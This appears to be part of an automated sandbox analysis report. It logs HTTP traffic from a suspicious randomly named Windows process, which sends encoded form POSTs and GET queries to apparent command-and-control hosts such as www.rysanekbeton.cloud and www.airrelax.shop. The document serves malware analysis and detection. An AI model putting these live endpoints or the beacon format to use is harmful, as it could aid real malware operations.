                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 55 34 67 37 36 62 36 70 55 79 46 70 70 38 6d 31 6a 4e 41 71 37 5a 63 45 6c 68 53 4e 31 53 4f 42 34 33 5a 7a 55 4b 37 51 34 5a 58 2f 48 73 6e 61 59 2b 73 73 72 73 2f 75 31 7a 2b 37 37 48 37 53 57 72 77 37 38 45 6f 52 6e 35 33 57 74 2b 43 79 57 52 4c 41 36 71 38 61 59 36 41 73 72 64 78 4d 43 6d 30 42 55 66 62 75 45 4d 44 6e 6f 6a 57 57 30 77 67 46 6f 55 63 43 4e 43 51 31 36 6e 73 41 77 43 6c 2b 64 70 45 62 6f 6b 64 53 4e 59 30 55 55 6e 53 49 62 6e 55 32 79 4c 4e 68 58 77 4b 6f 49 30 68 6b 51 4a 4e 44 44 65 77 58 7a 67 55 50 50 66 66 57 74 41 2f 5a 32 32 79 69 42 38 54 5a 36 30 61 58 73 63 6a 58 41 43 45 69 54 6c 6a 4e 4e 41 57 38 78 6c 42 59 48 39 63 44 37 63 57 6a 36 74 6f 6f 64 34 4d 3d
                                                                                  Data Ascii: PHM8hj-=U4g76b6pUyFpp8m1jNAq7ZcElhSN1SOB43ZzUK7Q4ZX/HsnaY+ssrs/u1z+77H7SWrw78EoRn53Wt+CyWRLA6q8aY6AsrdxMCm0BUfbuEMDnojWW0wgFoUcCNCQ16nsAwCl+dpEbokdSNY0UUnSIbnU2yLNhXwKoI0hkQJNDDewXzgUPPffWtA/Z22yiB8TZ60aXscjXACEiTljNNAW8xlBYH9cD7cWj6tood4M=
                                                                                  Dec 9, 2024 06:59:56.969290972 CET | 355 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 09 Dec 2024 05:59:56 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  39 | 192.168.2.7 | 50016 | 81.2.196.19 | 80 | 5412 | C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 9, 2024 06:59:58.352252960 CET | 1877 | OUT | POST /k6bb/ HTTP/1.1
                                                                                  Host: www.rysanekbeton.cloud
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.rysanekbeton.cloud
                                                                                  Referer: http://www.rysanekbeton.cloud/k6bb/
                                                                                  Content-Length: 1252
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 55 34 67 37 36 62 36 70 55 79 46 70 70 38 6d 31 6a 4e 41 71 37 5a 63 45 6c 68 53 4e 31 53 4f 42 34 33 5a 7a 55 4b 37 51 34 5a 50 2f 48 63 37 61 65 74 30 73 71 73 2f 75 72 6a 2b 36 37 48 36 4b 57 71 5a 77 38 45 6c 73 6e 37 2f 57 69 37 65 79 42 77 4c 41 31 71 38 61 45 4b 41 58 7a 39 77 49 43 6d 6b 46 55 66 4c 75 45 4d 44 6e 6f 6a 36 57 7a 6c 63 46 71 55 63 42 62 53 51 48 6f 58 73 6b 77 43 38 4a 64 70 51 74 6f 55 39 53 4d 35 59 55 57 52 6d 49 64 33 55 30 2f 72 4e 51 58 77 47 6a 49 30 39 43 51 4b 51 6d 44 63 67 58 78 31 4e 31 63 4f 2f 70 78 77 7a 54 32 33 66 46 4b 63 4f 75 37 46 71 66 78 63 6a 53 63 43 38 6a 51 55 79 48 4f 31 50 36 73 55 6c 59 66 76 77 7a 79 38 7a 32 69 2b 49 50 48 65 43 6a 68 48 6c 6e 44 67 54 54 70 31 41 4a 38 51 4b 50 4d 32 73 6b 67 4a 79 56 6b 73 45 49 61 79 6c 76 6e 50 70 6e 49 4d 59 56 73 38 50 42 56 72 6d 6c 4b 50 63 76 32 2b 43 52 55 38 57 55 4e 61 4f 6e 79 65 56 74 78 2f 75 34 52 41 38 76 54 47 70 77 4c 72 6b 34 58 76 70 4c 53 66 52 42 57 6c 6c 51 61 5a [TRUNCATED]
                                                                                  Data Ascii: PHM8hj-=U4g76b6pUyFpp8m1jNAq7ZcElhSN1SOB43ZzUK7Q4ZP/Hc7aet0sqs/urj+67H6KWqZw8Elsn7/Wi7eyBwLA1q8aEKAXz9wICmkFUfLuEMDnoj6WzlcFqUcBbSQHoXskwC8JdpQtoU9SM5YUWRmId3U0/rNQXwGjI09CQKQmDcgXx1N1cO/pxwzT23fFKcOu7FqfxcjScC8jQUyHO1P6sUlYfvwzy8z2i+IPHeCjhHlnDgTTp1AJ8QKPM2skgJyVksEIaylvnPpnIMYVs8PBVrmlKPcv2+CRU8WUNaOnyeVtx/u4RA8vTGpwLrk4XvpLSfRBWllQaZVmaDvmGYdroSdLQ4qC2b983M2xarsyKiGVaQV4UJuR/Lc7cyqKOz2ECOO2jhhdGbSxN3j460++e88QMyZbicCjPi6tjVxA+9atoqPi6OMSC2f/o2BAPZkoluDl6cihwz4555EKdAYByh852/zo438Uo1JGWUhW9Q1NUtStb9T3KiEZgM8W6gDJgyRd3yEcgX9GbxuyfqVUJAD3xz/3ngAjqR3p3lbhJ6X335ngYc7+GGf4z3XcHHl5Pc6cwDu+yNyoBuv6OnjAWtbS9CQh+Nyft0Y9ZChftID5XtQku8r5cbRyKexp6jR1s4XrLNbiz33HxFomGoySLgJe6rVVzVIP4Ac5ezop/enEjMQEfu2MTp72xaYrKq2qQ1wnlzWx8CNphzvcb4CqAe5Ei2P0em489kja5/F5KuJuKS2ajWRcg3WqQfeaSf17N+V2nzl3n8TQUawGiTyTitmp6iAgWkuUCCnKwlaqvC+omCSOd9k70HVFrL/mOUGPT0gwuiADOsf6R/ehvgA3UL1sPHhJEf1+S9Ecg0azyAeYhUwh1pmk3EokWsKhsGr6Yug+nQ2ug/OIn8vqoUlicZmHa28mxr0gPGqi0KdCixXeZxDyvP7/lDekibPJdUe+e+p1jVIMA/PuAXP1VdrX7qaQj5+YVbrYCmgDBfgCqAeA [TRUNCATED]
                                                                                  Dec 9, 2024 06:59:59.626090050 CET | 355 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 09 Dec 2024 05:59:59 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  40 | 192.168.2.7 | 50017 | 81.2.196.198 | 80 | 5412 | C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 9, 2024 07:00:01.016196966 CET | 565 | OUT | GET /k6bb/?tHfx=9byl&PHM8hj-=Z6Ib5suwfioT2MqXoPl7+8o1pTKj4Qq520tiYNnV3r2mKqn+I/1Rm9W7kmGP+w3QV4Zo4FZXiImSr7GjAT/7kY4RF4YTze4eHm0UBMvXCvyEnRCS3SYcyFprHgke6jUgzgZsbqAOrl5q HTTP/1.1
                                                                                  Host: www.rysanekbeton.cloud
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Dec 9, 2024 07:00:02.298327923 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 09 Dec 2024 06:00:02 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  41 | 192.168.2.7 | 50018 | 172.67.215.235 | 80 | 5412 | C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 9, 2024 07:00:12.780421972 CET | 829 | OUT | POST /gvzg/ HTTP/1.1
                                                                                  Host: www.airrelax.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.airrelax.shop
                                                                                  Referer: http://www.airrelax.shop/gvzg/
                                                                                  Content-Length: 220
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 36 62 46 4c 79 69 68 6f 38 4a 59 69 79 63 34 78 67 53 52 55 64 41 4c 6d 46 6f 32 77 79 6f 79 47 76 64 6d 67 6b 4b 57 47 39 34 6d 63 54 36 50 6c 66 71 70 52 65 61 2b 4b 62 51 56 32 35 65 41 41 6e 68 35 49 67 4f 73 56 76 35 77 2f 50 69 78 51 78 62 2f 48 79 37 44 64 31 64 37 69 36 61 63 63 52 72 42 39 49 45 68 6a 32 46 48 64 56 6c 32 70 70 58 5a 61 70 7a 59 51 62 74 6c 42 66 57 69 46 6c 79 4e 31 4a 66 41 2b 32 39 38 4d 4d 4c 30 68 69 62 4d 6e 7a 37 50 7a 30 45 59 4c 5a 4a 34 6f 48 50 31 57 37 54 72 4f 6b 69 34 6a 38 77 65 61 44 7a 56 6f 74 43 34 75 61 64 50 64 61 5a 6c 72 50 4f 6d 63 70 7a 76 4a 47 63 65 41 55 33 53 58 62 51 3d 3d
                                                                                  Data Ascii: PHM8hj-=6bFLyiho8JYiyc4xgSRUdALmFo2wyoyGvdmgkKWG94mcT6PlfqpRea+KbQV25eAAnh5IgOsVv5w/PixQxb/Hy7Dd1d7i6accRrB9IEhj2FHdVl2ppXZapzYQbtlBfWiFlyN1JfA+298MML0hibMnz7Pz0EYLZJ4oHP1W7TrOki4j8weaDzVotC4uadPdaZlrPOmcpzvJGceAU3SXbQ==
                                                                                  Dec 9, 2024 07:00:14.169251919 CET | 1236 | IN | HTTP/1.1 405 Not Allowed
                                                                                  Date: Mon, 09 Dec 2024 06:00:13 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0J9aLdfWraoed6lSd8v7d3WmFswUReiOcPbRq0De7cNkjLdHjySgg7DPb%2FbY%2FefNCVMipDtebnDxLBNqAznGhOVQN8qMM2Nsa6fKixqN%2B7iXXajDxHwr2vjeC1Bd2PmW1Pllhg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ef2c60d8bb442f7-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2198&min_rtt=2198&rtt_var=1099&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=829&delivery_rate=0&cwnd=169&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                  Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSI
                                                                                  Dec 9, 2024 07:00:14.169265985 CET | 107 | IN | Data Raw: 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72
                                                                                  Data Ascii: E and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                  Dec 9, 2024 07:00:14.169270039 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  42 | 192.168.2.7 | 50019 | 172.67.215.235 | 80 | 5412 | C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 9, 2024 07:00:15.444647074 CET | 849 | OUT | POST /gvzg/ HTTP/1.1
                                                                                  Host: www.airrelax.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.airrelax.shop
                                                                                  Referer: http://www.airrelax.shop/gvzg/
                                                                                  Content-Length: 240
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 36 62 46 4c 79 69 68 6f 38 4a 59 69 6a 49 45 78 69 7a 52 55 66 67 4c 68 4f 49 32 77 35 49 79 34 76 64 71 67 6b 49 36 73 39 71 43 63 64 35 62 6c 65 75 39 52 64 61 2b 4b 54 77 56 7a 68 2b 41 78 6e 68 31 71 67 4d 49 56 76 39 51 2f 50 6a 42 51 78 73 72 47 30 72 44 66 39 39 37 6b 6e 4b 63 63 52 72 42 39 49 46 45 30 32 46 66 64 56 56 47 70 7a 30 42 5a 71 7a 59 50 59 74 6c 42 62 57 6a 4f 6c 79 4e 48 4a 65 73 45 32 2b 45 4d 4d 4c 6b 68 6a 4b 4d 6b 35 37 50 35 70 55 59 41 51 37 4a 32 4f 63 55 74 32 69 6a 4e 72 78 49 2f 35 47 66 34 5a 52 5a 45 7a 54 41 56 65 66 72 72 4e 2f 34 65 4e 50 69 45 6b 52 62 6f 5a 72 37 71 5a 6c 7a 54 4e 75 36 51 31 4d 57 49 38 46 73 64 7a 46 6f 4d 54 75 35 54 31 78 63 3d
                                                                                  Data Ascii: PHM8hj-=6bFLyiho8JYijIExizRUfgLhOI2w5Iy4vdqgkI6s9qCcd5bleu9Rda+KTwVzh+Axnh1qgMIVv9Q/PjBQxsrG0rDf997knKccRrB9IFE02FfdVVGpz0BZqzYPYtlBbWjOlyNHJesE2+EMMLkhjKMk57P5pUYAQ7J2OcUt2ijNrxI/5Gf4ZRZEzTAVefrrN/4eNPiEkRboZr7qZlzTNu6Q1MWI8FsdzFoMTu5T1xc=
                                                                                  Dec 9, 2024 07:00:16.709985971 CET | 1236 | IN | HTTP/1.1 405 Not Allowed
                                                                                  Date: Mon, 09 Dec 2024 06:00:16 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PSCx3DeYs001Apdy%2B3S2KWdu03mI8lkmD7phY4Pv6oTLOGRHkcikzGF6z2YYTLPp4qedAcVx6hgPkJsrIKe5RTfaPiqCQsIkFLd9%2Br5rjbk%2FThkJHxV%2Bejmk3CuGKI8SjlSbmQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ef2c61e3c1c436e-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1704&min_rtt=1704&rtt_var=852&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=849&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                  Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MS
                                                                                  Dec 9, 2024 07:00:16.710019112 CET | 113 | IN | Data Raw: 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66
                                                                                  Data Ascii: IE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  43 | 192.168.2.7 | 50020 | 172.67.215.235 | 80 | 5412 | C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 9, 2024 07:00:18.122150898 CET | 1862 | OUT | POST /gvzg/ HTTP/1.1
                                                                                  Host: www.airrelax.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.airrelax.shop
                                                                                  Referer: http://www.airrelax.shop/gvzg/
                                                                                  Content-Length: 1252
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 36 62 46 4c 79 69 68 6f 38 4a 59 69 6a 49 45 78 69 7a 52 55 66 67 4c 68 4f 49 32 77 35 49 79 34 76 64 71 67 6b 49 36 73 39 71 4b 63 64 4a 48 6c 65 4a 42 52 63 61 2b 4b 5a 51 56 79 68 2b 41 57 6e 68 39 75 67 4d 30 46 76 2f 6f 2f 50 45 70 51 33 5a 58 47 39 72 44 66 78 64 37 6c 36 61 63 56 52 71 74 35 49 45 30 30 32 46 66 64 56 57 65 70 39 33 5a 5a 73 7a 59 51 62 74 6b 56 66 57 69 70 6c 79 56 74 4a 65 59 75 32 76 6b 4d 4d 71 55 68 6c 34 6b 6b 78 37 50 33 71 55 5a 41 51 37 46 58 4f 63 5a 57 32 69 58 72 72 79 59 2f 34 53 66 75 63 79 56 76 73 77 4d 7a 59 5a 71 4e 41 65 34 70 41 73 69 2b 74 47 69 54 59 6f 4c 53 55 6b 6e 53 5a 62 54 47 73 74 71 73 7a 58 63 75 6a 69 4a 46 48 74 67 58 67 30 43 63 33 68 4c 76 51 4d 61 69 75 6b 2f 49 6d 58 52 38 56 76 75 41 44 55 42 47 2f 74 62 65 74 6b 69 45 6a 62 4d 45 6c 67 63 2b 33 44 38 74 6e 64 54 6d 78 64 39 6c 2b 49 48 69 61 39 2f 56 44 35 48 68 6d 6d 2f 36 48 4e 52 58 34 43 6b 47 78 6b 61 67 57 45 68 69 76 57 47 41 4d 36 5a 35 49 57 63 49 69 46 [TRUNCATED]
                                                                                  Data Ascii: PHM8hj-= [TRUNCATED]
                                                                                  Dec 9, 2024 07:00:19.388838053 CET | 1236 | IN | HTTP/1.1 405 Not Allowed
                                                                                  Date: Mon, 09 Dec 2024 06:00:19 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vp58%2BFWFG9hZv40cyCUsOs54KEjJrg9xV7fkCx4TNAhVlU9K2TmuupGoULevJKLkpg4s1pJUHYFbqxZh2UxLmYVgavowsWCpwbpiVhsgCgXnPTlz14Dpe0%2BzuOodH4pRr9MCIw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ef2c62ef8ee42e7-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
